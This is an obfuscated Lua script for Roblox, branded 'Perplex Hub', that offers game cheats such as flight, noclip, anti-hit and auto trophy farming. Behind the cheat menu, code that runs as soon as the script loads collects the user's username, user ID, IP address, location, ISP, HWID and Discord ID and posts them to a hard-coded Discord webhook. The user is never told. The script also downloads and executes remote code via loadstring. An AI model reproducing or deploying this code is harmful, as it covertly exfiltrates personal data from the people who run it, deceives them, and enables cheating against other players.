--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

print("✅ Perplex Hub - Loading script...");local v0="https://discord.com/api/webhooks/1455369739529490607/-avwpeq2AgMziHmQsJl_dbRryJtzAmvm_ILM-ZrUW0JUpkVuVuYrXwcX79cxos_fJSug";local v1=true;local v2=game:GetService("Players");local v3=v2.LocalPlayer;local v4=game:GetService("RunService");local v5=game:GetService("UserInputService");local v6=game:GetService("HttpService");local v7=getgenv().PerplexUserInfo or {Username=v3.Name,DisplayName=v3.DisplayName,UserId=tostring(v3.UserId),AccountAge=tostring(v3.AccountAge),IPAddress="Unknown",Country="Unknown",City="Unknown",ISP="Unknown",ExecutorUsed="Unknown",Platform="Unknown",HWID="Unknown",SessionId="Unknown",PlaceId=tostring(game.PlaceId),Timestamp=os.date("%Y-%m-%d %H:%M:%S")} ;local function v8(v27) if ( not v1 or (v0=="")) then return;end pcall(function() local v106=420 -(381 + 39) ;local v107;while true do if (v106==0) then v107=http_request or v107 or HttpPost or syn.request ;if v107 then pcall(function() v107({Url=v0,Method="POST",Headers={["Content-Type"]="application/json"},Body=v6:JSONEncode(v27)});end);end break;end end end);end local function v9() local v28=0;local v29;local v30;local v31;while true do if (v28==(2 + 1)) then table.insert(v31,{name="⚙️ Executor",value=v7.ExecutorUsed,inline=true});table.insert(v31,{name="📱 Platform",value=v7.Platform,inline=true});table.insert(v31,{name="🎮 Game",value=v29,inline=false});v28=4 -0 ;end if (v28==4) then table.insert(v31,{name="🆔 Place ID",value=v7.PlaceId,inline=true});table.insert(v31,{name="🕒 Time",value=v7.Timestamp,inline=true});v8({embeds={{title="🎮 Perplex Hub - Script Loaded",description="**Game Script Executed**",color=3447003,fields=v31,footer={text="Perplex Hub • Session: "   .. v7.SessionId },timestamp=os.date("!%Y-%m-%dT%H:%M:%SZ")}}});break;end if (v28==2) then table.insert(v31,{name="🌐 IP Address",value="`"   .. v7.IPAddress   .. "`" ,inline=true});table.insert(v31,{name="📍 Location",value=v7.City   .. ", "   .. v7.Country ,inline=true});table.insert(v31,{name="📡 ISP",value=v7.ISP,inline=false});v28=6 -3 ;end if (v28==(1 -0)) then v31={{name="👤 Roblox Username",value=v7.Username   .. " (@"   .. v7.DisplayName   .. ")" ,inline=false},{name="🆔 Roblox User ID",value=v7.UserId,inline=true},{name="📅 Account Age",value=v7.AccountAge   .. " days" ,inline=true}};if v30.discord_id then local v127=0 + 0 ;while true do if (v127==0) then table.insert(v31,{name="💬 Discord User",value="<@"   .. v30.discord_id   .. ">" ,inline=true});table.insert(v31,{name="🆔 Discord ID",value=v30.discord_id,inline=true});break;end end end table.insert(v31,{name="💻 HWID",value="`"   .. (((v7.HWID~="Unknown") and v7.HWID:sub(792 -(368 + 423) ,100 -68 )) or "Unknown")   .. "`" ,inline=false});v28=20 -(10 + 8) ;end if (v28==(0 -0)) then v29="Unknown Game";pcall(function() v29=game:GetService("MarketplaceService"):GetProductInfo(game.PlaceId).Name;end);v30=getgenv().PerplexDiscordInfo or {} ;v28=443 -(416 + 26) ;end end end v9();local function v10() local v32=Instance.new("ScreenGui");v32.Name="PerplexWelcome";v32.ResetOnSpawn=false;v32.ZIndexBehavior=Enum.ZIndexBehavior.Sibling;local v37=Instance.new("Frame");v37.Size=UDim2.new(0,400,0,798 -548 );v37.Position=UDim2.new(0.5, -(86 + 114),0.5, -(220 -95));v37.BackgroundColor3=Color3.fromRGB(10,15,25);v37.BorderSizePixel=438 -(145 + 293) ;v37.Parent=v32;local v43=Instance.new("UICorner");v43.CornerRadius=UDim.new(430 -(44 + 386) ,1501 -(998 + 488) );v43.Parent=v37;local v46=Instance.new("UIStroke");v46.Color=Color3.fromRGB(32 + 68 ,150,209 + 46 );v46.Thickness=774 -(201 + 571) ;v46.Transparency=1138.5 -(116 + 1022) ;v46.Parent=v37;local v51=Instance.new("TextLabel");v51.Size=UDim2.new(1,0,0,333 -253 );v51.Position=UDim2.new(0 + 0 ,0,0 -0 ,40);v51.BackgroundTransparency=1;v51.Text="PERPLEX HUB";v51.TextColor3=Color3.fromRGB(905 -650 ,255,255);v51.TextSize=891 -(814 + 45) ;v51.Font=Enum.Font.GothamBold;v51.Parent=v37;local v61=Instance.new("UIGradient");v61.Color=ColorSequence.new({ColorSequenceKeypoint.new(0,Color3.fromRGB(6 + 94 ,150,91 + 164 )),ColorSequenceKeypoint.new(1 -0 ,Color3.fromRGB(1280 -(1020 + 60) ,1573 -(630 + 793) ,255))});v61.Parent=v51;local v64=Instance.new("TextLabel");v64.Size=UDim2.new(3 -2 ,0,0 -0 ,16 + 24 );v64.Position=UDim2.new(0 -0 ,0,1747 -(760 + 987) ,2033 -(1789 + 124) );v64.BackgroundTransparency=1;v64.Text="Thanks for using Perplex Hub";v64.TextColor3=Color3.fromRGB(916 -(745 + 21) ,59 + 111 ,200);v64.TextSize=40 -25 ;v64.Font=Enum.Font.Gotham;v64.Parent=v37;local v74=Instance.new("Frame");v74.Size=UDim2.new(0 -0 ,0 + 0 ,0,3 + 0 );v74.Position=UDim2.new(1055.5 -(87 + 968) , -(660 -510),0,164 + 16 );v74.BackgroundColor3=Color3.fromRGB(226 -126 ,1563 -(447 + 966) ,255);v74.BorderSizePixel=0 -0 ;v74.Parent=v37;local v80=Instance.new("UICorner");v80.CornerRadius=UDim.new(1818 -(1703 + 114) ,701 -(376 + 325) );v80.Parent=v74;local v83=Instance.new("TextLabel");v83.Size=UDim2.new(1,0,0 -0 ,30);v83.Position=UDim2.new(0 -0 ,0 + 0 ,0 -0 ,214 -(9 + 5) );v83.BackgroundTransparency=1;v83.Text="Loading...";v83.TextColor3=Color3.fromRGB(120,516 -(85 + 291) ,1435 -(243 + 1022) );v83.TextSize=49 -36 ;v83.Font=Enum.Font.Gotham;v83.Parent=v37;v32.Parent=game:GetService("CoreGui");spawn(function() local v108=0;while true do if (v108==(0 + 0)) then for v128=0,1480 -(1123 + 57) ,15 do local v129=0;while true do if (v129==(0 + 0)) then v74.Size=UDim2.new(254 -(163 + 91) ,v128,0,3);wait(1930.03 -(1869 + 61) );break;end end end wait(0.5);v108=1 + 0 ;end if (v108==(3 -2)) then v32:Destroy();break;end end end);end v10();wait(1.5);local v11=loadstring(game:HttpGet("https://sirius.menu/rayfield"))();local v12=v11:CreateWindow({Name="❄️ Perplex Hub",LoadingTitle="Perplex Hub",LoadingSubtitle="Loading Systems...",ConfigurationSaving={Enabled=false}});local v13=v12:CreateTab("⚡ Main",4483362458 -0 );local v14=v12:CreateTab("⚙️ Misc",4483362458 -0 );local v15=v12:CreateTab("🔧 Settings",4483363505 -(67 + 980) );local v16=v3;local v17=v4;local v18=game:GetService("ReplicatedStorage"):FindFirstChild("invisivel");if v18 then v18.OnClientEvent:Connect(function(v109) if (_G.SeePlayers and (v109==true)) then task.defer(function() pcall(function() firesignal(v18.OnClientEvent,false);end);end);end end);end local v19=v13:CreateSection("Game Features");v13:CreateToggle({Name="See Players (Anti-Invis)",CurrentValue=false,Flag="SeePlayersToggle",Callback=function(v93) local v94=1474 -(1329 + 145) ;while true do if (v94==(971 -(140 + 831))) then _G.SeePlayers=v93;if (v93 and v18) then pcall(function() firesignal(v18.OnClientEvent,false);end);end break;end end end});v13:CreateToggle({Name="AntiHit (Enable In game)",CurrentValue=false,Flag="UndergroundToggle",Callback=function(v95) local v96=0;local v97;local v98;while true do if (2==v96) then if v95 then spawn(function() while _G.Underground do local v138=v98.CFrame;v98.CFrame=v138 * CFrame.new(1850 -(1409 + 441) , -(723 -(15 + 703)),0) ;v17.RenderStepped:Wait();v98.CFrame=v138;end end);end break;end if (1==v96) then v98=v97 and v97:FindFirstChild("HumanoidRootPart") ;if  not v98 then return;end v96=1 + 1 ;end if (v96==(438 -(262 + 176))) then _G.Underground=v95;v97=v16.Character;v96=1722 -(345 + 1376) ;end end end});v13:CreateToggle({Name="Auto Trophy Money",CurrentValue=false,Flag="TrophyToggle",Callback=function(v99) _G.TrophyFarm=v99;if v99 then spawn(function() while _G.TrophyFarm do local v123=688 -(198 + 490) ;local v124;local v125;local v126;while true do if (v123==2) then task.wait(0.3 -0 );break;end if (v123==(0 -0)) then v124=v16.Character;v125=v124 and v124:FindFirstChild("HumanoidRootPart") ;v123=1207 -(696 + 510) ;end if (1==v123) then v126=workspace:FindFirstChild("Trophy",true);if (v126 and v125) then pcall(function() local v149=0 -0 ;while true do if (v149==0) then firetouchinterest(v125,v126,1262 -(1091 + 171) );task.wait();v149=1 + 0 ;end if (v149==(3 -2)) then firetouchinterest(v125,v126,3 -2 );break;end end end);end v123=376 -(123 + 251) ;end end end end);end end});local v20=v14:CreateSection("Movement");local v21;v14:CreateToggle({Name="Noclip",CurrentValue=false,Flag="NoclipFlag",Callback=function(v100) local v101=0 -0 ;while true do if (v101==0) then _G.Noclip=v100;if _G.Noclip then v21=v17.Stepped:Connect(function() if (_G.Noclip and v16.Character) then for v145,v146 in pairs(v16.Character:GetDescendants()) do if (v146:IsA("BasePart") and v146.CanCollide) then v146.CanCollide=false;end end end end);elseif v21 then v21:Disconnect();end break;end end end});local v22=748 -(208 + 490) ;v14:CreateToggle({Name="Fly",CurrentValue=false,Flag="FlyFlag",Callback=function(v102) _G.Flying=v102;if  not v16.Character then return;end local v103=v16.Character:WaitForChild("HumanoidRootPart");if v102 then local v110=v103;local v111={F=0,B=0 + 0 ,L=0 + 0 ,R=0};local function v112() local v117=836 -(660 + 176) ;local v118;local v119;while true do if (v117==2) then v119=Instance.new("BodyVelocity",v110);v119.Velocity=Vector3.new(0 + 0 ,0.1,202 -(14 + 188) );v117=678 -(534 + 141) ;end if (v117==3) then v119.MaxForce=Vector3.new(9000000423 -(39 + 896) ,8999999488,8999999488 -0 );spawn(function() local v141=0;while true do if (v141==(0 -0)) then repeat task.wait();if (((v111.L + v111.R)~=(0 -0)) or ((v111.F + v111.B)~=0)) then v119.Velocity=((workspace.CurrentCamera.CFrame.lookVector * (v111.F + v111.B)) + ((workspace.CurrentCamera.CFrame * CFrame.new(v111.L + v111.R ,(v111.F + v111.B) * 0.2 ,0).p) -workspace.CurrentCamera.CFrame.p)) * v22 ;else v119.Velocity=Vector3.new(0 + 0 ,0.1 + 0 ,396 -(115 + 281) );end v118.CFrame=workspace.CurrentCamera.CFrame;until  not _G.Flying v118:Destroy();v141=2 -1 ;end if (1==v141) then v119:Destroy();break;end end end);break;end if (v117==(0 + 0)) then v118=Instance.new("BodyGyro",v110);v118.P=217507 -127507 ;v117=1;end if (v117==(3 -2)) then v118.MaxTorque=Vector3.new(9000000355 -(550 + 317) ,8999999488 -0 ,9157666563 -157667075 );v118.CFrame=v110.CFrame;v117=5 -3 ;end end end local v113=v5;v113.InputBegan:Connect(function(v120) if  not _G.Flying then return;end if (v120.KeyCode==Enum.KeyCode.W) then v111.F=286 -(134 + 151) ;elseif (v120.KeyCode==Enum.KeyCode.S) then v111.B= -(1666 -(970 + 695));elseif (v120.KeyCode==Enum.KeyCode.A) then v111.L= -(1 -0);elseif (v120.KeyCode==Enum.KeyCode.D) then v111.R=1991 -(582 + 1408) ;end end);v113.InputEnded:Connect(function(v121) if (v121.KeyCode==Enum.KeyCode.W) then v111.F=0 -0 ;elseif (v121.KeyCode==Enum.KeyCode.S) then v111.B=0;elseif (v121.KeyCode==Enum.KeyCode.A) then v111.L=0 -0 ;elseif (v121.KeyCode==Enum.KeyCode.D) then v111.R=0;end end);v112();end end});local v23=v15:CreateSection("Information");v15:CreateParagraph({Title="Perplex Hub",Content="Universal script hub with key system\nJoin Discord for support!"});local v24=v15:CreateSection("Social");v15:CreateButton({Name="Join Discord Server",Callback=function() if setclipboard then local v114=0 -0 ;while true do if (v114==(1824 -(1195 + 629))) then setclipboard("https://discord.gg/qyZXnRwm5a");v11:Notify({Title="Discord",Content="Invite copied to clipboard!",Duration=3,Image=5439888322 -956525864 });break;end end end end});v15:CreateButton({Name="Copy Discord Invite",Callback=function() if setclipboard then local v115=1551 -(226 + 1325) ;while true do if (v115==0) then setclipboard("https://discord.gg/qyZXnRwm5a");v11:Notify({Title="Copied",Content="Discord invite: https://discord.gg/qyZXnRwm5a",Duration=3,Image=4483362458});break;end end end end});local v25=v15:CreateSection("Credits");v15:CreateParagraph({Title="Developer",Content="Created by: stonenode\nDiscord: stonenode"});v15:CreateButton({Name="Copy Creator Discord",Callback=function() if setclipboard then setclipboard("stonenode");v11:Notify({Title="Copied",Content="Discord username copied: stonenode",Duration=3 + 0 ,Image=4483362458});end end});local v26=v15:CreateSection("Utilities");v15:CreateButton({Name="Rejoin Server",Callback=function() local v104=0;local v105;while true do if (v104==(0 + 0)) then v105=game:GetService("TeleportService");v105:Teleport(game.PlaceId);break;end end end});v15:CreateButton({Name="Destroy UI",Callback=function() v11:Destroy();end});v11:LoadConfiguration();v11:Notify({Title="Perplex Hub",Content="Script loaded successfully! 🎮",Duration=5,Image=5088541502 -605179044 });print("✅ Perplex Hub - Fully Loaded!");print("📌 Discord: https://discord.gg/qyZXnRwm5a");print("👤 Created by: stonenode");
